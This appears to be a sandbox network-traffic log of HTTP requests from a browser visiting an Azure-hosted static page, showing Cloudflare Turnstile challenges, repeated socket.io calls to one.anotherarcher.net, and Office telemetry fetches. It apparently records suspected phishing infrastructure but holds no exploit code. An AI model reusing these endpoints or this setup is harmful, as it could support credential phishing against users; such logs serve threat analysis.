Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd93368b41996/1727989089354/f2a24b3605d2a2fd91949aab9be5a46cf22d06763787f0531d7b9f7a2d1b4a53/xbLOGbtpCsyg4Sy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uzg9m/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fsegf/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBGPN&sid=sEYXozu9UpbVjsuFAANv HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBG8u&sid=sEYXozu9UpbVjsuFAANv HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBG8o&sid=sEYXozu9UpbVjsuFAANv HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd94f6c630fa5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fsegf/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd93368b41996/1727989089358/W6rJjyMCftFIYFr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uzg9m/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBGPN&sid=sEYXozu9UpbVjsuFAANv HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd94f6c630fa5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd93368b41996/1727989089358/W6rJjyMCftFIYFr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBH6k HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=CMo5ShZjWOLfhW2MAANy HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: dXJOytvT8uoE2w46IFG6HQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd94f6c630fa5/1727989094428/deef8a0ed8aae284c1c72944fc7a6f0c33d395920e52133f3ad64e24c5ed85dd/_fECSCZ3w_01X7V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fsegf/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBHRq&sid=CMo5ShZjWOLfhW2MAANy HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/687507771:1727987450:jxf_mcxDVQ0QXXYkXbNZiukg_OB_AtvnOk_Sj49H5RI/8ccfd93368b41996/2529022dc1e7737 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/kjx4d/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd94f6c630fa5/1727989094429/tXap5lw161HPEn9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fsegf/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1665307749:1727987491:etmL7Xn2i2nZPB7PBeOOEZraZHJJ_mSeUDhe9JDUOk0/8ccfd94f6c630fa5/7a47944f51ba360 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBH6k HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBHnI&sid=CMo5ShZjWOLfhW2MAANy HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBHRo&sid=CMo5ShZjWOLfhW2MAANy HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBHRq&sid=CMo5ShZjWOLfhW2MAANy HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd97029dc19b2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/kjx4d/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd94f6c630fa5/1727989094429/tXap5lw161HPEn9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd97029dc19b2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBIP2 HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBHnI&sid=CMo5ShZjWOLfhW2MAANy HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
